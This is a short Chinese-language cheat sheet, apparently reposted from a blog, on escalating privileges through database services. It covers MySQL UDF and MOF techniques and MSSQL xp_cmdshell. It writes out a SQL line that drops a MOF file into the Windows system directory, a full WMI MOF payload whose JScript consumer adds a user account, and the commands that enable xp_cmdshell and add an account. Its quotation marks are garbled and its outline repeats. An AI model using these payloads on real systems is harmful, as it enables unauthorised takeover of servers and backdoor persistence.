服务提权
- mysql
- UDF提权
- 要求有写权限,并且未过滤单引号
- windows
- UDF导出到系统目录 C:/WINDOWS/SYSTEM32/
MYSQL版本 < 5.1
- UDF导出到安装路径 MYSQL\Lib\Plugin
MYSQL版本 > 5.1
- UDF导出到系统目录 C:/WINDOWS/SYSTEM32/
- linux
- /usr/lib/mysql/plugin
- MOF提权
- 只有windows
- 步骤
- 1.找个可写目录,将MOF文件上传
- 2.执行以下sql语句,mof文件内命令便会执行
- select load_file(‘C:/wmpub/nullevt.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof‘
- mofcomp.exe xxx.mof 执行mof文件
- 调用lmofcompiler接口的$complieFile方法
- pragma namespace(“\\.\root\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa ”Win32_LocalTime” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(”WScript.Shell”)\nWSH.run(”net.exe user secist 123 /add”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
- 步骤
- 只有windows
- UDF提权
- mssql
- xp_cmdshell
- 开启:
EXEC sp_configure ‘show advanced options‘,1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell‘,1;
RECONFIGURE; - exec xp_cmdshell ‘net user test test /add‘
- 开启:
- xp_regwrite
- xp_regread
- xp_cmdshell
- tomcat
- 弱口令
原文地址:https://www.cnblogs.com/drac4ry/p/12230049.html
时间: 2024-10-09 02:08:54